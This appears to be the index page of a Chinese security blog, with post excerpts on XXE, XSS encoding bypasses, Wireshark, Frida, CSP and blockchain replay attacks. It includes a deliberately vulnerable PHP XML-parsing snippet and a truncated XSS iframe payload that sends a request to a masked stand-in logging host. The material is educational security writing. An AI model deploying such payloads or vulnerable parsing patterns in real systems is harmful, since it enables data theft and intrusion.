凡心所向,素履所往

凡心所向,素履所往

纯净水@流云的自留地

XXE实例及应用3
Java - XXE Java - XXEXXE在Java 代码中的漏洞示例 JAVA常见XXE漏洞写法案例spring-data-XMLBean XXE复现分析搭建环境【1】下载环境 git clone https://github.com/spring-projects/spring-data-examples.git 【2】下载安装maven并配置好环境变量因为这里的新版本已经对次做了修复,所以这里的版本改为 2.0.5 <dependency> <groupId>org.springframework.data<...
[Untitled Post]
wireshark 使用记录 (-)[TOC] 恶意流量检查在一台服务器上发现有恶意木马,对该设备进行wireshark 抓包分析,很久没用过wireshark了,记录回顾下。 wireshark 流量分析过滤协议 ctrl+F 或者 http contains”xxx” 来过滤协议 过滤IPIP源地址:ip.src ==192.168.1.1 IP目的地址:ip.dst== 192.168.1.1 IP地址(包括源和目的):ip.addr== 192.168.1.1 过滤端口TCP端口:tcp.port==80 TCP目的端口:tcp.dstport == 80 TCP源端口:tcp....
ETH 漏洞复现
[TOC] ETH系统环境 ubuntu 16 搭建私有测试链 下载相关的go-ethereum 协议 git clone https://github.com/ethereum/go-ethereum.git 安装go环境 wget https://dl.google.com/go/go1.12.linux-amd64.tar.gz tar -C /usr/local -xzf go1.12.linux-amd64.tar.gz 修改配置环境vim ~/.bashrc export GOROOT=/usr/local/go export GOPATH=/home/go_demo ...
XXE 示例及利用-java—SDK-1
[TOC] XXE实例分析在接着之前对XXE的了解和学习,但一直在实战中都没遇到,正好这段时间在同事的渗透工作中又遇到了微信SDK的XXE漏洞,便趁着这个机会结合之前对微信SDK中的XXE漏洞,总结一波。 ex1漏洞原理 微信SDK XXE漏洞分析1 没有找到原漏洞代码,看到原漏洞修复后代码: https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip 在这个案例中,漏洞逻辑为:微信在JAVA版本的SDK中提供callback回调功能,用来帮助商家接收异步付款结果,该接口接受XML格式的数据,攻击者可以构造恶...
frida理解与学习
【1】pip install frida 【2】sudo pip install frida-tools 【3】我这里使用的测试机cpuinfo是 Processor : ARMv7 Processor rev 0 (v7l) 所以下载的对应的server版本是frida-server-12.2.29-android-arm 在启动对应的sever后,可以不用端口转发直接测试链接 frida-ps -U:在另一个终端的常规操作系统shell中检测frida中进程 frida-trace : 跟踪由对应应用使用的特定调用 如 跟踪chrome使用的open应用 frida-trac...
安全策略-csp理解与学习
内容安全策略 CSP百度百科概念: CSP指的是内容安全策略,为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系统引入了内容安全策略(CSP)的一般概念。这将引入一些相当严格的策略,会使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容 直白的说就是通过该浏览器扩展 进行 加载资源脚本的黑白名单限制;实现和执行均由浏览器完成 功能效果主要用来防注入脚本(比如 xss 加载其他域下的js;广告注入h5页面、运营商的http劫持)图片、iframe、fton、style等等可能的远程的资源 限制远程资源的请求,如通过远程请求将资源如cookie传...
2019
随着2018的过去,生活不知不觉的过去的一年,这一年里感觉多多少少还是需要说点啥,先总的一说,总体还是比较满意的,顺利的毕业、顺利的工作,但近段时间以来,感觉个人浮躁了很多,可能是根本就没让自己沉淀下来吧,新的一年,还是给自己树立一个小的flag吧。 重新规划技术成长的节奏 团队技术性成长 回归生活 先学会吉他 开始练字静心
XXE 示例及利用
注:libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用 简析XXEphp漏洞示例: <?php $data = file_get_contents('php://input'); $xml = simplexml_load_string($data); echo $xml->name; 其中发送请求的请求头:当前客户端可以接收的文档类型。 Accept: text/html,application/xhtml+xml,application/xm...
编码绕过xss
标签img、video、audio、iframe中的src属性只能请求,不能执行,在ie8以前可以;但可以使用js伪协议调用js <iframe src="javascript:alert('iframe')" width = "0" height = "0"/> <iframe src="javascript:var img=document.createElement('img'); img.src='http://xx.xxx.xxx.xxx/log&#...
BCH分叉-重放攻击解决方案
BCH分叉 重放攻击解决方案BCH在进行硬分叉:分为BCH和BCHSV 对于分叉前拥有BCH的用户,在分叉后该钱包中会拥有BCH/BSV两种虚拟货币,若是分叉前钱包里有BCH,在硬分叉完成后,这个钱包里也会生成相应的BSV 目的:分离同一地址中 共同存在的BCH和BSV 来防重放攻击针对转账业务限制条件:该用户账户拥有BCH的同时也拥有BSV利用原理:在用户原意在分叉后转帐 BCH 时,该消息被攻击者广播在BSV链上,导致用户的BSV资产也被转移,受到重放攻击。 INPUT污染法分离:INPUT污染法的原理:就是用分叉后的BCH混入分叉前的BCH,从而达到分离BCH与BSV的目的。具体操...